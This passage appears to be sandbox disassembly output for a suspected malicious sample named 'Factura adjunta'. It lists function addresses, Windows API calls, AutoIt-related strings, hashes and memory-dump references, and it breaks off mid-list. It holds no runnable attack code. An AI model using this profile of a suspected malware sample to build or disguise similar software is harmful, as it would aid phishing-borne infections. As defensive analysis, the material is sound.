                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: DialogNtdllProc_
                            • String ID:
                            • API String ID: 3239928679-0
                            • Opcode ID: 98ebe3d6afdc2df07a211f2c453c2e5ad9b59cbd0620f8ce2819d4cec3b6dd66
                            • Instruction ID: 7ed872ff7b91c63d0589d3c717f349e88fc429d4b2beeb099673c33dfe296103
                            • Opcode Fuzzy Hash: 98ebe3d6afdc2df07a211f2c453c2e5ad9b59cbd0620f8ce2819d4cec3b6dd66
                            • Instruction Fuzzy Hash: 36E0E235200208AFCB01DF88D888E863BA5BB1D300F004064FA1547262CB71A830EBA2
                            Function 0083CB7F Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                            Download Yara Rule
                            APIs
                            • NtdllDialogWndProc_W.NTDLL ref: 0083CBA4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: DialogNtdllProc_
                            • String ID:
                            • API String ID: 3239928679-0
                            • Opcode ID: b32d741c34405fe9cffb77e46408f4bd4c0e8421ddfcf2ec2f133a232984301b
                            • Instruction ID: 0f70f50ec1947ceac887862e990965fbdca4caa7cff8de932b60ad319ab7f19a
                            • Opcode Fuzzy Hash: b32d741c34405fe9cffb77e46408f4bd4c0e8421ddfcf2ec2f133a232984301b
                            • Instruction Fuzzy Hash: 1FE04275240249EFDB01DF88D949D963BA5BB5D700F014464FA1547262CB71A870EBA2
                            Function 007B16B5 Relevance: 1.5, APIs: 1, Instructions: 14nativeCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                              • Part of subcall function 007B201B: DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007B20D3
                              • Part of subcall function 007B201B: KillTimer.USER32(-00000001,?,?,?,?,007B16CB,00000000,?,?,007B1AE2,?,?), ref: 007B216E
                            • NtdllDialogWndProc_W.NTDLL(?,00000002,00000000,00000000,00000000,?,?,007B1AE2,?,?), ref: 007B16D4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$DestroyDialogKillLongNtdllProc_Timer
                            • String ID:
                            • API String ID: 2797419724-0
                            • Opcode ID: b5e081a3a8bc17009209f35c26589031b31d1fe39dcc192b338cd3b52243100c
                            • Instruction ID: ac03d4fb888efaddca7a2dffa4244c7a60441050ac71f73ac45e7004faa9a183
                            • Opcode Fuzzy Hash: b5e081a3a8bc17009209f35c26589031b31d1fe39dcc192b338cd3b52243100c
                            • Instruction Fuzzy Hash: 95D01230340308B7DA103B90DC1BF993A19EB54B96F40C420FB08691D3DA75A821A598
                            Function 007F2230 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                            Download Yara Rule
                            APIs
                            • GetUserNameW.ADVAPI32(?,?), ref: 007F2242
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: NameUser
                            • String ID:
                            • API String ID: 2645101109-0
                            • Opcode ID: 62f6a7dbb9c55fd1ee5c5ee8551edb82f8df731781033f19298e17cbf1b0c149
                            • Instruction ID: d14e452b46ae6238449290d1378fef884a0dc09d6cb4abe3bf42529d3894641e
                            • Opcode Fuzzy Hash: 62f6a7dbb9c55fd1ee5c5ee8551edb82f8df731781033f19298e17cbf1b0c149
                            • Instruction Fuzzy Hash: 55C04CF1C0410DDBDB05DB90D998DFE77BCBB04304F104455A601F2101D7749B448E71
                            Function 007DA364 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                            Download Yara Rule
                            APIs
                            • SetUnhandledExceptionFilter.KERNEL32(?), ref: 007DA36A
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ExceptionFilterUnhandled
                            • String ID:
                            • API String ID: 3192549508-0
                            • Opcode ID: 4f210eedf9f7b597c304486aa0537b74288cb3f3782c130dfc398e6b26902837
                            • Instruction ID: e88886c1003158ed5f77fcaba7b7e7d773309aaa524d4dfcdf100968e71a5419
                            • Opcode Fuzzy Hash: 4f210eedf9f7b597c304486aa0537b74288cb3f3782c130dfc398e6b26902837
                            • Instruction Fuzzy Hash: E7A0123000010CA78A001B41EC044457F5CE641190B004020F50C411228732541045C0
                            Function 007C8A0E Relevance: .6, Instructions: 608COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e642d5415c38586c8801324de9cf1cf3bcc33bcc49722d8d60fb947eaf696aa8
                            • Instruction ID: c6b4beb9c7815fe951018863f7a273fb584050d5babbb928fdbd7e6fe1c6847b
                            • Opcode Fuzzy Hash: e642d5415c38586c8801324de9cf1cf3bcc33bcc49722d8d60fb947eaf696aa8
                            • Instruction Fuzzy Hash: 4722E4706056258BDFB88E24C8D4B7E77A1FB41304F6984AED852CB2D1DB389D81DB72
                            Function 007D2405 Relevance: .3, Instructions: 345COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                            • Instruction ID: c0f1eaf2d614eadef484d6f5e0ea341dbfbb4b75830446ef465a0e0a081d3ab4
                            • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                            • Instruction Fuzzy Hash: 9BC1A53220619309DF2D4639947443EBAF15EB27B135A0B5FE4B3CB6C5EF18D526D620
                            Function 007D283A Relevance: .3, Instructions: 341COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                            • Instruction ID: 4f44a59baece29114f09fbd593f1b10a3f63f78d421335bc3238c0aa734a4ccd
                            • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                            • Instruction Fuzzy Hash: E5C1953220519309DF2D4739847403EBBF15BA27B135A0B6FE4B2DB6D5EF28D526E620
                            Function 00827B1B Relevance: 75.7, APIs: 39, Strings: 4, Instructions: 491filecommemoryCOMMON
                            Download Yara Rule
                            APIs
                            • DeleteObject.GDI32(00000000), ref: 00827B70
                            • DeleteObject.GDI32(00000000), ref: 00827B82
                            • DestroyWindow.USER32 ref: 00827B90
                            • GetDesktopWindow.USER32 ref: 00827BAA
                            • GetWindowRect.USER32(00000000), ref: 00827BB1
                            • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00827CF2
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00827D02
                            • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827D4A
                            • GetClientRect.USER32(00000000,?), ref: 00827D56
                            • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00827D90
                            • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827DB2
                            • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827DC5
                            • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827DD0
                            • GlobalFix.KERNEL32(00000000), ref: 00827DD9
                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827DE8
                            • GlobalUnWire.KERNEL32(00000000), ref: 00827DF1
                            • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827DF8
                            • GlobalFree.KERNEL32(00000000), ref: 00827E03
                            • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00842CAC,00000000), ref: 00827E2B
                            • GlobalFree.KERNEL32(00000000), ref: 00827E3B
                            • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00827E61
                            • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00827E80
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00827EA2
                            • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0082808F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$Global$Rect$CreateFile$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadMessagePictureReadSendShowSizeWire
                            • String ID: $AutoIt v3$DISPLAY$static
                            • API String ID: 2547915802-2373415609
                            • Opcode ID: b2481719a8234b6f631db307c37489df89c4a3197113fa8f5471b365f3d8c9d7
                            • Instruction ID: a1c931ff0898c5b80fe65c35229ac2066af5325558a4ec6c888bc5df7637708f
                            • Opcode Fuzzy Hash: b2481719a8234b6f631db307c37489df89c4a3197113fa8f5471b365f3d8c9d7
                            • Instruction Fuzzy Hash: B0028C71900119EFDB14DF65DC89EAE7BB9FB48310F108558FA15EB2A2DB74AD40CBA0
                            Function 008337F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                            Download Yara Rule
                            APIs
                            • CharUpperBuffW.USER32(?,?,0083F910), ref: 008338AF
                            • IsWindowVisible.USER32(?), ref: 008338D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: BuffCharUpperVisibleWindow
                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                            • API String ID: 4105515805-45149045
                            • Opcode ID: f0d529b7f5dc77ec9221eeb06947f8af5dd57fa8a87f918d94930011cade14de
                            • Instruction ID: 9f87990f7a3a478b1e014a7b2a0151ef29ee95c4cb8d457257345aa096cdaa1a
                            • Opcode Fuzzy Hash: f0d529b7f5dc77ec9221eeb06947f8af5dd57fa8a87f918d94930011cade14de
                            • Instruction Fuzzy Hash: C8D17130204205DBCB14EF24C855B6AB7A6FF94358F004459B986EB3A3DB25EE4ACBC1
                            Function 0083A849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                            Download Yara Rule
                            APIs
                            • SetTextColor.GDI32(?,00000000), ref: 0083A89F
                            • GetSysColorBrush.USER32(0000000F), ref: 0083A8D0
                            • GetSysColor.USER32(0000000F), ref: 0083A8DC
                            • SetBkColor.GDI32(?,000000FF), ref: 0083A8F6
                            • SelectObject.GDI32(?,?), ref: 0083A905
                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0083A930
                            • GetSysColor.USER32(00000010), ref: 0083A938
                            • CreateSolidBrush.GDI32(00000000), ref: 0083A93F
                            • FrameRect.USER32(?,?,00000000), ref: 0083A94E
                            • DeleteObject.GDI32(00000000), ref: 0083A955
                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0083A9A0
                            • FillRect.USER32(?,?,?), ref: 0083A9D2
                            • GetWindowLongW.USER32(?,000000F0), ref: 0083A9FD
                              • Part of subcall function 0083AB60: GetSysColor.USER32(00000012), ref: 0083AB99
                              • Part of subcall function 0083AB60: SetTextColor.GDI32(?,?), ref: 0083AB9D
                              • Part of subcall function 0083AB60: GetSysColorBrush.USER32(0000000F), ref: 0083ABB3
                              • Part of subcall function 0083AB60: GetSysColor.USER32(0000000F), ref: 0083ABBE
                              • Part of subcall function 0083AB60: GetSysColor.USER32(00000011), ref: 0083ABDB
                              • Part of subcall function 0083AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0083ABE9
                              • Part of subcall function 0083AB60: SelectObject.GDI32(?,00000000), ref: 0083ABFA
                              • Part of subcall function 0083AB60: SetBkColor.GDI32(?,00000000), ref: 0083AC03
                              • Part of subcall function 0083AB60: SelectObject.GDI32(?,?), ref: 0083AC10
                              • Part of subcall function 0083AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0083AC2F
                              • Part of subcall function 0083AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0083AC46
                              • Part of subcall function 0083AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0083AC5B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                            • String ID:
                            • API String ID: 4124339563-0
                            • Opcode ID: 63ecff8b822573aaba40dc5477776254d2c6a32d957c05a3878f8c70cd05cb16
                            • Instruction ID: 440fe27eb8b34663ecda8a9486524f1735e2565d975299b361b3251ce26560d2
                            • Opcode Fuzzy Hash: 63ecff8b822573aaba40dc5477776254d2c6a32d957c05a3878f8c70cd05cb16
                            • Instruction Fuzzy Hash: C7A17E72408305FFD7159F64DC08E6B7BA9FBC8321F104A29FAA2D61A2D775D844CB92
                            Function 008277BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32(00000000), ref: 008277F1
                            • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 008278B0
                            • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 008278EE
                            • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00827900
                            • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00827946
                            • GetClientRect.USER32(00000000,?), ref: 00827952
                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00827996
                            • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 008279A5
                            • GetStockObject.GDI32(00000011), ref: 008279B5
                            • SelectObject.GDI32(00000000,00000000), ref: 008279B9
                            • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 008279C9
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 008279D2
                            • DeleteDC.GDI32(00000000), ref: 008279DB
                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00827A07
                            • SendMessageW.USER32(00000030,00000000,00000001), ref: 00827A1E
                            • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00827A59
                            • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00827A6D
                            • SendMessageW.USER32(00000404,00000001,00000000), ref: 00827A7E
                            • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00827AAE
                            • GetStockObject.GDI32(00000011), ref: 00827AB9
                            • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00827AC4
                            • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00827ACE
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                            • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                            • API String ID: 2910397461-517079104
                            • Opcode ID: 69ca81a898cd77b83bb3b249467199565c49d9c0669837c841b89b20ce898e1c
                            • Instruction ID: b5bef6bb384c4e6bce6d938c662070089f1da3887962580771637535ff2273c2
                            • Opcode Fuzzy Hash: 69ca81a898cd77b83bb3b249467199565c49d9c0669837c841b89b20ce898e1c
                            • Instruction Fuzzy Hash: 33A18DB1A00619BFEB149BA4DC4AFAE7BB9FB44710F004514FA14E72E1DB74AD40CBA4
                            Function 0081AF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                            Download Yara Rule
                            APIs
                            • SetErrorMode.KERNEL32(00000001), ref: 0081AF89
                            • GetDriveTypeW.KERNEL32(?,0083FAC0,?,\\.\,0083F910), ref: 0081B066
                            • SetErrorMode.KERNEL32(00000000,0083FAC0,?,\\.\,0083F910), ref: 0081B1C4
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000087E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199087461.00000000008D7000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2199103589.00000000008D8000.00000004.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_7b0000_Factura adjunta.jbxd
                            Similarity
                            • API ID: ErrorMode$DriveType
                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                            • API String ID: 2907320926-4222207086
                            • Opcode ID: 492291620b6a2b741ce9bf2ccd4b061fee1b9a0e8e86f5becbfe26abefcd5dff
                            • Instruction ID: 55a1cd243297c385cc807f1cc53ccb18437550d97bd409cb4b90f1a94c3eb010
                            • Opcode Fuzzy Hash: 492291620b6a2b741ce9bf2ccd4b061fee1b9a0e8e86f5becbfe26abefcd5dff
                            • Instruction Fuzzy Hash: 5A519E70684209FBCB08DB20C992EFD73B9FF54345B224015E92AF7291CB29AD81DB42
                            Function 007B6A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2198954451.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                            • Associated: 00000000.00000002.2198937722.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.0000000000865000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2198954451.000000000086F000.00000040.00000001.01000000.00000003.sdmpDownload File
